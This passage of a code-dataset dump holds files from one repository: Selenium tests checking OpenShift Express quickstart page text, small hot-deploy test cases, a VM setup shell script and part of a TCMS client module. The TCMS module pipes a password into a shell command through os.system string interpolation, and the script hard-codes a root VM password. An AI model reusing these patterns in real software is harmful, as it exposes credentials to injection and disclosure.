baseutils.assert_text_equal_by_css(self,\"EXPRESS VIDEOS\",\"#videos > header > h1\")\n baseutils.assert_text_equal_by_xpath(self,\"OpenShift Express Product Tour\",\"//*[@id='videos']/div[1]/header/h2\")\n baseutils.assert_text_equal_by_css(self,\"Mike McGrath, Cloud Architect - Red Hat\",\"p.video-author.author\")\n baseutils.assert_element_present_by_xpath(self,\"//section[@id='videos']/div/div/a/img\")\n baseutils.assert_text_equal_by_css(self,\"This video walks you through the high level functionality of OpenShift Express, from installing the client tools, creating a subdomain to deploying your app onto the cloud.\",\"p.video-description\")\n baseutils.assert_text_equal_by_xpath(self,\"Mobile App Deployment to Express w/ Appcelerator\",\"//section[@id='videos']/div[2]/header/h2\")\n baseutils.assert_text_equal_by_xpath(self,\"Nolan Wright, CTO and Co-Founder - Appcelerator\",\"//section[@id='videos']/div[2]/p\")\n baseutils.assert_element_present_by_xpath(self,\"//section[@id='videos']/div[2]/div/a/img\")\n baseutils.assert_text_equal_by_xpath(self,\"This video shows you just how easy it is to develop and deploy a mobile app onto OpenShift Express with Appcelerator's Mobile Cloud Platform\",\"//section[@id='videos']/div[2]/p[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Deploying to OpenShift PaaS with the eXo Cloud IDE\",\"//section[@id='videos']/div[3]/header/h2\")\n baseutils.assert_text_equal_by_xpath(self,\"Mark Downey, Developer Advocate\",\"//section[@id='videos']/div[3]/p\")\n baseutils.assert_element_present_by_xpath(self,\"//section[@id='videos']/div[3]/div/a/img\")\n baseutils.assert_text_equal_by_xpath(self,\"This video demonstrates how easy it is to use the eXo cloud IDE to develop and deploy applications on OpenShift.\",\"//section[@id='videos']/div[3]/p[2]\")\n baseutils.click_element_by_link_text(self,\"Watch more videos\")\n baseutils.check_title(self,\"Videos | Red Hat OpenShift Community\")\n\n\n \n def test_check_express_navi(self):\n # baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.click_element_by_xpath(self,\"//*[@id='account']/ul/li/a\")\n baseutils.assert_text_equal_by_css(self,\"Sign up for OpenShift - it's Easy!\",\"#signup > header > h1\")\n baseutils.click_element_by_css_no_wait(self,\"#signup > a.close_button > img\")\n baseutils.click_element_by_link_text(self,\"Documentation\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift 
Express\",\"span.productname\")\n baseutils.check_title(self,\"User Guide\")\n baseutils.go_back(self)\n baseutils.click_element_by_link_text(self,\"Forum\")\n baseutils.check_title(self,\"Express | Red Hat OpenShift Community\")\n \n\n def test_a_check_express_quick_start_links(self):\n #baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n #baseutils.click_element_by_css(self,\"#toc > li > a\")\n #baseutils.assert_text_equal_by_xpath(self,\"Install the client tools\",\"//h3\")\n time.sleep(3)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\".//*[@id='toc']/li[3]/a\")\n baseutils.scroll_by(self)\n baseutils.assert_text_equal_by_xpath(self,\"Create your first application\",\"//li[@id='create_application']/h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Make a change, publish\")\n baseutils.scroll_by(self)\n baseutils.assert_text_equal_by_xpath(self,\"Make a change, publish\",\"//li[@id='publish']/h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Next steps\")\n baseutils.assert_text_equal_by_css(self,\"Next steps\",\"#next_steps > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Red Hat Enterprise Linux or Fedora\")\n baseutils.assert_text_equal_by_xpath(self,\"Red Hat Enterprise Linux or Fedora\",\"//li[@id='rhel']/h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Other Linux Systems\")\n baseutils.assert_text_equal_by_css(self,\"Other Linuxes\",\"#other_nix > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Mac OS X\")\n baseutils.assert_text_equal_by_css(self,\"Mac\",\"#mac > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Windows\")\n baseutils.assert_text_equal_by_css(self,\"Windows\",\"#win > h4\")\n time.sleep(5)\n baseutils.scroll_bar(self)\n if config.proxy :\n baseutils.click_element_by_link_text(self,\"openshift.repo\")\n baseutils.go_back(self)\n #baseutils.go_to_express_quick_start(self)\n time.sleep(5)\n else :\n baseutils.assert_element_present_by_link_text(self,\"openshift.repo\")\n \n baseutils.scroll_bar(self)\n baseutils.click_element_by_xpath(self,\".//*[@id='rhel']/aside/p[1]/a\")\n baseutils.check_title(self,\"Sudo Main Page\")\n baseutils.go_back(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Installing OpenShift client tools video walkthrough\")\n baseutils.check_title(self,\"OpenShift Express -- Install the OpenShift Express Client Tools - YouTube\")\n baseutils.go_back(self)\n baseutils.scroll_bar(self)\n baseutils.click_element_by_link_text(self,\"Full Xcode Suite -- or --\")\n baseutils.check_title(self,\"Download Xcode 4 - Apple Developer\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_link_text(self,\"git for OS X\")\n baseutils.check_title(self,\"git-osx-installer - OSX Installer for Git - Google Project Hosting\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n 
baseutils.click_element_by_link_text(self,\"Cygwin\")\n baseutils.check_title(self,\"Cygwin\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n time.sleep(5)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_xpath(self,\"//div[@id='domain_link']/a\")\n baseutils.assert_text_equal_by_css(self,\"Control Panel\",\"section.main > header > h1\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0, 0);\")\n if config.proxy :\n baseutils.click_element_by_link_text(self,\"Creating a application video walkthrough\")\n baseutils.check_title(self,\"OpenShift Express -- Create and Define your Application - YouTube\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n baseutils.click_element_by_link_text(self,\"Deploying an application video walkthrough\")\n baseutils.check_title(self,\"OpenShift Express -- Deploy to the Cloud - YouTube\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0,0);\")\n else :\n baseutils.assert_element_present_by_link_text(self,\"Creating a application video walkthrough\")\n baseutils.assert_element_present_by_link_text(self,\"Deploying an application video walkthrough\")\n \n \n def test_aa_check_express_quick_start_links_a(self):\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n baseutils.click_element_by_link_text(self,\"TurboGears2 Python framework\")\n baseutils.assert_text_equal_by_xpath(self,\"Deploying TurboGears2 Python web framework using Express\",\"//section/div[2]/h2\")\n# baseutils.check_title(self,\"Deploying TurboGears2 Python web framework using Express | Red Hat Openshift Community\")\n# baseutils.go_back(self)\n# self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n baseutils.go_to_express(self)\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n baseutils.click_element_by_link_text(self,\"Pyramid Python framework\")\n baseutils.assert_element_present_by_link_text(self,\"http://pylonsproject.org/projects/pyramid/about\")\n# baseutils.assert_text_equal_by_xpath(self,\"OpenShift > Community > Blogs > Deploying a Pyramid application in a virtual Python WSGI environment on Red Hat OpenShift Express\",\"//section[@id='about']/div\")\n baseutils.go_back(self)\n self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(@href, 'https://www.redhat.com/openshift/sites/default/files/documents/RHOS_Express_Getting_Started_w_Drupal.pdf')]\")\n baseutils.assert_element_present_by_xpath(self,\"//a[contains(@href, 'https://www.redhat.com/openshift/sites/default/files/documents/RHOS_Express_Getting_Started_w_MediaWiki.pdf')]\")\n baseutils.click_element_by_xpath(self,\"//li[@id='next_steps']/ul/li/a\")\n baseutils.assert_text_equal_by_xpath(self,\"Videos\",\"//section[@id='about']/div[2]/div[2]/h2\")\n# baseutils.check_title(self,\"Videos | Red Hat Openshift Community\")\n baseutils.go_to_express(self)\n 
baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"QUICKSTART\",\".//*[@id='quickstart']/header/h1\")\n# self.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n baseutils.click_element_by_link_text(self,\"Technical Documentation\")\n baseutils.assert_text_equal_by_xpath(self,\"User Guide\",\"//div[@id='id3774062']/div/div/div[2]/h1\")\n# baseutils.check_title(self,\"User Guide\")\n baseutils.go_back(self)\n baseutils.click_element_by_link_text(self,\"Support Forums\")\n baseutils.assert_text_equal_by_xpath(self,\"FORUM\",\"//section[@id='about']/div[2]/div/table/thead/tr/th\")\n# baseutils.check_title(self,\"Forums | Red Hat Openshift Community\")\n baseutils.go_back(self)\n\n\n \n def test_check_express_quick_start_contents(self):\n #baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_xpath(self,\"Install the client tools\",\"//*[@id='install_client_tools']/h3\")\n baseutils.assert_text_equal_by_xpath(self,\"Red Hat Enterprise Linux or Fedora\",\"//li[@id='rhel']/h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"h5\")\n baseutils.assert_text_equal_by_xpath(self,\"RHEL 6 and up or Fedora 14 and up.\",\"//li[@id='rhel']/ol/li/ul/li\")\n baseutils.assert_text_equal_by_xpath(self,\"Root or sudoer access\",\"//li[@id='rhel']/ol/li/ul/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Download the express repo file openshift.repo\",\"//li[@id='rhel']/ol/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,'Move the openshift.repo file to your /etc/yum.repos.d/ directory.\\n$ sudo mv ~/Downloads/openshift.repo /etc/yum.repos.d/\\nReplace \\'~/Downloads/openshift.repo\\' with the location to which you saved the repo file.',\"//li[@id='rhel']/ol/li[3]\")\n baseutils.assert_text_equal_by_xpath(self,\"$ sudo mv ~/Downloads/openshift.repo /etc/yum.repos.d/\",\"//li[@id='rhel']/ol/li[3]/pre\")\n baseutils.assert_text_equal_by_xpath(self,'Install the client tools:\\n$ sudo yum install rhc',\"//li[@id='rhel']/ol/li[4]\")\n baseutils.assert_text_equal_by_css(self,\"The sudo command will only work if your user is listed in the sudoers file. For more information on setting up sudo, see http://www.gratisoft.us/sudo/sudo.html.\",\"aside > p\")\n baseutils.assert_text_equal_by_xpath(self,\"As an alternative to sudo, you can activate a root terminal with the su command and the root password. In that case, omit sudo from the given commands. 
Don't forget to close your root terminal when you're done!\",\"//li[@id='rhel']/aside/p[2]\")\n baseutils.assert_text_equal_by_css(self,\"Other Linuxes\",\"#other_nix > h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"#other_nix > ol > li.prereqs > h5\")\n baseutils.assert_text_equal_by_css(self,\"Root access\",\"#other_nix > ol > li.prereqs > ul > li\")\n baseutils.assert_text_equal_by_xpath(self,\"Ruby 1.8 or higher installed or available to be installed\",\"//li[@id='other_nix']/ol/li/ul/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Install the required packages: git, ruby, rubygems, and the ruby 1.8 development package.\",\"//li[@id='other_nix']/ol/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Install the gem:\\n$ su -c \\'gem install rhc\\'\",\"//li[@id='other_nix']/ol/li[3]\")\n baseutils.assert_text_equal_by_css(self,\"Mac\",\"#mac > h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"#mac > ol > li.prereqs > h5\")\n baseutils.assert_text_equal_by_xpath(self,\"Full Xcode Suite -- or --\",\"//li[3]/ol/li/ul/li/ol/li/a\")\n baseutils.assert_text_equal_by_xpath(self,\"git for OS X\",\"//li[3]/ol/li/ul/li/ol/li[2]/a\")\n baseutils.assert_text_equal_by_css(self,\"Windows\",\"#win > h4\")\n baseutils.assert_text_equal_by_css(self,\"Prerequisites\",\"#win > ol > li.prereqs > h5\")\n baseutils.assert_text_equal_by_xpath(self,'The following optional cygwin components\\nopenssh\\nruby\\nmake\\ngcc\\ngit',\"//li[@id='win']/ol/li/ul/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Download and extract rubygems from http://rubyforge.org/projects/rubygems\",\"//li[@id='win']/ol/li[2]\")\n baseutils.assert_text_equal_by_xpath(self,'From within cygwin run:\\n$ ruby <path_to_extracted_rubygems>/setup.rb install',\"//li[@id='win']/ol/li[3]\")\n baseutils.assert_text_equal_by_xpath(self,'Install the gem:\\n$ gem install rhc',\"//li[@id='win']/ol/li[4]\")\n baseutils.assert_text_equal_by_css(self,\"Create a domain name\",\"#create_domain_name > h4\")\n baseutils.assert_text_equal_by_css(self,\"Using your OpenShift login and password, call rhc-create-domain to create a unique domain name for your applications.\",\"div.main > p\")\n \n def test_check_express_quick_start_contents_b(self):\n #baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.granted_user[0],config.granted_user[1])\n baseutils.check_title(self,\"OpenShift by Red Hat | Express\")\n baseutils.click_element_by_link_text(self,\"Quickstart\")\n baseutils.assert_text_equal_by_css(self,'$ rhc-create-domain -n mydomain -l rhlogin\\nPassword: (type... type... type...)',\"div.main > pre\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift domain names make up part of your app's url. 
They are also unique across all OpenShift users, so choose wisely, and be creative!\",\"div.main > aside > p\")\n baseutils.assert_text_equal_by_xpath(self,\"The rhc-create-domain command will create a configuration file - <your home directory>/.openshift/express.conf - which sets up a default login.\",\"//li[@id='create_domain_name']/div/aside[2]/p\")\n baseutils.assert_text_equal_by_css(self,\"Why wait?\",\"#domain_link > h4\")\n baseutils.assert_text_equal_by_css(self, \"Reserve your amazing domain name right now!\",\"#domain_link > h5\")\n baseutils.assert_text_equal_by_css(self,\"All you need is an ssh keypair and a unique name.\",\"#domain_link > p\")\n baseutils.assert_text_equal_by_css(self,\"Create your first application\",\"#create_application > h4\")\n baseutils.assert_text_equal_by_css(self,\"Now you can create an application.\",\"#create_application > p\")\n baseutils.assert_text_equal_by_css(self,'$ rhc-create-app -a myapp -t php-5.3\\nPassword: (type... type... type...)',\"#create_application > pre\")\n # baseutils.assert_text_equal_by_xpath(self,\"This will create a remote git repository for your application, and clone it locally in your current directory.\",\"//li[@id='create_application']/p[2]\")\n baseutils.assert_text_equal_by_css(self,\"OpenShift offers many application stacks. Run rhc-create-app -h to see all of your options.\",\"#create_application > aside > p\")\n baseutils.assert_text_equal_by_xpath(self,\"Your application's domain name will be <your app name>-<your domain name>.rhcloud.com. So, the application created by the example commands would be located at myapp-mydomain.rhcloud.com\",\"//li[@id='create_application']/aside[2]/p\")\n baseutils.assert_text_equal_by_css(self,\"Make a change, publish\",\"#publish > h4\")\n baseutils.assert_text_equal_by_css(self,\"As we all know, getting an application running is only the first step. Now you are on the road to making it your own. Here's an example for the php framework.\",\"#publish > p\")\n # baseutils.assert_text_equal_by_xpath(self,\"Now, check your URL - your change will be live.\",\"//li[@id='publish']/p[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Use whichever ide or editor works best for you. Chances are, it'll have git support. Even if it doesn't, you're just two simple commands away from glory!\",\"//li[@id='publish']/aside[2]/p\")\n baseutils.assert_text_equal_by_xpath(self,\"Checkout these great guides for deploying popular frameworks on OpenShift:\",\"//li[@id='publish']/aside[3]/p\")\n baseutils.assert_text_equal_by_css(self,\"Next steps\",\"#next_steps > h4\")\n baseutils.assert_text_equal_by_css(self,\"While this has gotten you started, there is a lot more information out there to really get you going. Check out the following pages for videos, blogs, and tutorials:\",\"#next_steps > p\")\n baseutils.assert_text_equal_by_css(self,'$ cd myapp\\n$ vim php/index.php\\n(Make a change... 
:wq)\\n$ git commit -a -m \\\"My first change\\\"\\n$ git push',\"#publish > pre\")\n \n \n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.6382636427879333, "alphanum_fraction": 0.6655948758125305, "avg_line_length": 21.600000381469727, "blob_id": "174b1f48a9712029aa4dce93c0f67c5ddafe9010", "content_id": "b61b91103c1c03c1ae87c9e39881ecff6eb591e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1244, "license_type": "no_license", "max_line_length": 113, "num_lines": 55, "path": "/automation/open/testmodules/UI/web/case_166505.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_166505.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass LoginWithSimpleAccount(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login_new(web.username_simple_account,web.password_simple_account)\n web.go_to_account_page()\n web.assert_text_equal_by_xpath(web.username_simple_account,\"//div[@id='new_web_user']/table/tbody/tr/td\")\n web.assert_text_equal_by_xpath(\"OpenShift\",\"//div[@id='new_web_user']/table/tbody/tr/td[2]\")\n\n\n self.tearDown()\n\n return self.passed(\" case_166505--LoginWithSimpleAccount passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginWithSimpleAccount)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_166505.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7008797526359558, "alphanum_fraction": 0.7155424952507019, "avg_line_length": 23.35714340209961, "blob_id": "9947ee793fa5868586106c695ad16622fb7fe770", "content_id": "2ea67468de34194ab450e1800e4541ebf7e894e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 682, "license_type": "no_license", "max_line_length": 116, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbosseap_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom jbosseap_with_jenkins import EAPHotDeployWithJenkins\n\nclass EAPScalingHotDeployWithJenkins(EAPHotDeployWithJenkins):\n def __init__(self, config):\n EAPHotDeployWithJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2443] Hot deployment support for scalable application - with Jenkins - jboss-eap6\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EAPScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7118402123451233, "alphanum_fraction": 0.7246790528297424, "avg_line_length": 24.035715103149414, "blob_id": "a134e1ab82cf781fef3404b3ca8a90ea70fe1327", "content_id": "46aa66df051c2f881b5c45eb6815eae71ad9edc0", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 701, "license_type": "no_license", "max_line_length": 117, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 6, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossews_without_jenkins import EWSHotDeployWithoutJenkins\n\nclass EWSScalingHotDeployWithoutJenkins(EWSHotDeployWithoutJenkins):\n def __init__(self, config):\n EWSHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2513] Hot deployment support for scalable application - without Jenkins - jbossEWS\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6482787132263184, "alphanum_fraction": 0.6777271032333374, "avg_line_length": 26.363636016845703, "blob_id": "84cd816294808aa4d062dd4570ba8ad89ca9bc48", "content_id": "d4854be841a42f6b9800235d687d65f3a6dac666", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2411, "license_type": "no_license", "max_line_length": 124, "num_lines": 88, "path": "/open_automation/bin/setup_onpremise_env.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nsource setup_onpremise_env.rc\n\nexport FEDORA_VERSION=16\nexport DEBIAN_VERSION=wheezy\nexport UBUNTU_VERSION=quantal\nexport RHEL_VERSION=6.3\nexport CENTOS_VERSION=6.3\n#host with kickstarts files and auto setup configuration\n#export KICKSTART_HOST=\"http://file.rdu.redhat.com/~mmasters/\"\nexport KICKSTART_HOST=\"https://github.com/openshift/enterprise/blob/enterprise-1.0/\"\nexport KICKSTART_HOST=\"http://file.brq.redhat.com/~mzimen/\"\nexport KICKSTART=\"${KICKSTART_HOST}/openshift.ks\"\nexport DISK_SIZE=\"8\" #size in GB\nexport RAM_SIZE=1024\n\necho \"Using RHEL $RHEL_VERSION now...\"\ncreate_guest_rhel\n\nexit 0\n\nset -e\nif ! $(rpm -q nmap 2>&1 >/dev/null); then\n echo \"please install nmap\"\n exit 1\nfi\ncurrent_dir=$(pwd)\necho \"Current Dir: $(pwd)\" \n# realpath is available on F16, not on rhel6.2\n#script_real_path=$(realpath $0)\n# start_with shell tips\n#if [[ \"$0\" = /* ]]; then\n# root_dir=$(dirname $script_dir)\nscript_dir=$(dirname $0)\npushd $script_dir && script_real_dir=$(pwd) && popd\nroot_dir=$(dirname $script_real_dir)\n# For jenkins integration source using\nif [ ! -f ${root_dir}/etc/onpremise/vm-template.xml ]; then\n root_dir=$(pwd)\nfi\n\nimg_path=\"http://fileshare.englab.nay.redhat.com/pub/libra/OnPremise/CleanImage/RHEL_6.3_x86_64.qcow2\"\nvm_img_dir=\"/var/lib/libvirt/images\"\nvm_template_xml=\"${root_dir}/etc/onpremise/vm-template.xml\"\nparent_vm_name=\"parent_node\"\nparent_vm_img=\"${vm_img_dir}/${parent_vm_name}.qcow2\"\n\nvm_username=\"root\"\nvm_password=\"redhat\"\nssh_key_file=\"${HOME}/.ssh/mykey\"\nboot_timeout=\"90\"\n\ntarget_repo_file=\"/etc/yum.repos.d/openshift_devops.repo\"\n\ndomain_name=\"devops.example.com\"\nbroker_name=\"broker\"\n\n\n\n\n\n########### CONFIGURATION ####################\n#\n# [BROKER]\n# |\n# +----[NODE0]\n# |\n# +----[NODE1]\n#\n###############################################\n\n\n# 1. Create BROKER from scratch if doesn't exist (use kickstart)\n# 2. 
Create 2 NODES from scratch if they don't exist (use kickstart)\n# 3. Do the testing\n\n\n\n\n# MAIN\n#prepare_parent_img \"http://download.lab.bos.redhat.com/rel-eng/OpenShift/Alpha/latest/DevOps/x86_64/os/\"\n#prepare_parent_img \"http://buildvm-devops.usersys.redhat.com/puddle/build/OpenShift/Alpha/2012-08-28.3/DevOps/x86_64/os/\" 1\n#create_broker \"${parent_vm_img}\" \"${broker_name}\" 1\n#add_node \"${parent_vm_img}\" \"node0\" \"${broker_ip}\" 1\n\n#broker_ip=\"10.66.9.141\"\n#add_node \"${parent_vm_img}\" \"node1\" \"$broker_ip\" 1\n\n\n\n" }, { "alpha_fraction": 0.5507246255874634, "alphanum_fraction": 0.5575490593910217, "avg_line_length": 36.69709396362305, "blob_id": "ebcb9fa432a0d8767ad0af902650e2ca4142ca22", "content_id": "132e689b2ed4d994b7254f9cb6a42eaf092a5d67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27255, "license_type": "no_license", "max_line_length": 134, "num_lines": 723, "path": "/automation/open/lib/tcms_base.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\ntest TCMS python module\n\n\"\"\"\nimport os\nimport sys\nimport datetime as dt\nfrom nitrate import NitrateKerbXmlrpc\nfrom datetime import timedelta\nimport datetime\nimport time\nimport json\nfrom StringIO import StringIO\nimport database\n\n#PROD = 'OpenShift Flex'\nIDLE = 1\nPASSED = 2\nFAILED = 3\n\nRUNNING = 0\nFINISHED = 1\n\nTEST_RUN_STATUS = {'RUNNING' : 0, 'FINISHED' : 1}\nCASE_RUN_STATUS = {'IDLE':1,'PASSED':2,'FAILED':3, 'RUNNING':4, 'PAUSED':5, \n 'BLOCKED':6,'ERROR':7, 'WAIVED':8}\n\nclass RunStatus(object):\n IDLE, PASSED, FAILED, RUNNING, PAUSED, BLOCKED, ERROR, WAIVED = range(1,\n 9)\n\ndef run_kinit():\n tcms_user = os.getenv('TCMS_USER')\n tcms_passwd = os.getenv('TCMS_PASSWORD')\n if (tcms_user is None) or (tcms_passwd is None):\n raise Exception(\"Missing TCMS login information in your env variables...\")\n ret_code = os.system(\"echo \\\"%s\\\" | kinit %s\" % (tcms_passwd, tcms_user))\n if ret_code != 0 :\n print \"Error: kinit failed!, ret_code is: %s\" % ret_code\n\n\n\nclass TCMS(object):\n ns = None\n test_plan_cases = None # total number ot testcases with this testplan\n prod_name = 'OpenShift 2.0'\n #prod_name = 'OpenShift Flex'\n host = 'https://tcms.engineering.redhat.com/xmlrpc/'\n #test_plan_name = 'Test Plan for OpenShift 2.0'\n test_plan_name = 'PPP_sandbox3'\n tcms_time = datetime.datetime.now()\n plan_id = None\n #tcms_time = datetime.datetime.now() + timedelta(hours=15)\n\n def __init__(self, product=None, test_plan=None, host=None):\n run_kinit()\n if product:\n self.prod_name = product\n if host:\n self.host = host\n if test_plan:\n self.test_plan_name = test_plan\n \n # do a kinit just in case.\n n = NitrateKerbXmlrpc(self.host)\n self.ns = n.server\n # get product information\n print (\"Getting information from testplan '%s'\" % self.test_plan_name) \n #self.info(\"xxx\", 1)\n self.test_plan = self.ns.TestPlan.filter({'name': self.test_plan_name})[0]\n self.plan_id = self.test_plan['plan_id']\n self.builds = self.get_builds()\n ### for a testplan with many cases, this can take a while, don't do it on init\n #self.test_plan_cases = self.ns.TestPlan.get_test_cases(self.test_plan['plan_id'])\n #print(\"TestPlan '%s', Number of testcases: %s\" % (test_plan, len(self.test_plan_cases))) \n\n def get_test_runs(self, plan_id=None):\n if plan_id == None:\n plan_id = self.test_plan['plan_id']\n\n runs = self.ns.TestPlan.get_test_runs(plan_id)\n return 
runs\n \n def get_product_version_id(self):\n prod_version_id = None\n versions = self.ns.Product.get_versions(self.test_plan['product_id'])\n for version in versions:\n if version['value'] == self.test_plan['default_product_version']:\n prod_version_id = version['id']\n return prod_version_id\n \n def get_components(self):\n components = self.ns.Product.get_components(self.prod_name)\n return components\n\n def get_builds(self):\n builds = self.ns.Product.get_builds(self.prod_name)\n return builds\n \n def create_build(self, params):\n return self.ns.Build.create(params)\n\n\n def get_build_id(self, build_name):\n res = self.ns.Build.check_build(build_name, self.prod_name)\n if res.has_key('args'): \n build_id = None\n else:\n build_id = self.ns.Build.check_build(build_name, self.prod_name)['build_id']\n return build_id\n\n def check_and_insert_build(self, build_name):\n \"\"\" helper function, insert a build by name if it does not exists in\n TCMS \"\"\"\n build_id = self.get_build_id(build_name)\n if build_id:\n return build_id\n else:\n # no build match found, insert it.\n build_params = {'product': self.prod_name, 'name': build_name,\n 'description': build_name}\n return self.create_build(build_params)\n\n def get_testcases_by_plan(self, plan_name, params):\n filter_dict = {'plan__name': plan_name}\n filter_dict = dict(filter_dict.items() + params.items())\n ts_list = self.ns.TestCase.filter(filter_dict)\n print(\"There is a total of %s testcases within plan %s\" % (len(ts_list),\n filter_dict['plan__name']))\n return ts_list\n \n def get_testcases(self, params={}):\n ts_list = self.get_testcases_by_plan(self.test_plan_name, params)\n self.testcases = ts_list\n return ts_list\n \n TestCases = property(get_testcases, None)\n\n\n def get_testcases_by_tag(self, tag_name, params=None):\n filter_dict = {'tag__name': tag_name, 'plan__name': self.test_plan_name}\n #filter_dict = {'tag__name': tag_name, 'plan': self.plan_id}\n res = self.ns.TestCase.filter(filter_dict)\n return res\n\n def get_testscripts_by_tag(self, tag_name):\n test_scripts = []\n filter_dict = {'tag__name': tag_name, 'plan__name': self.test_plan_name}\n #filter_dict = {'tag__name': tag_name, 'plan': self.plan_id}\n tests = 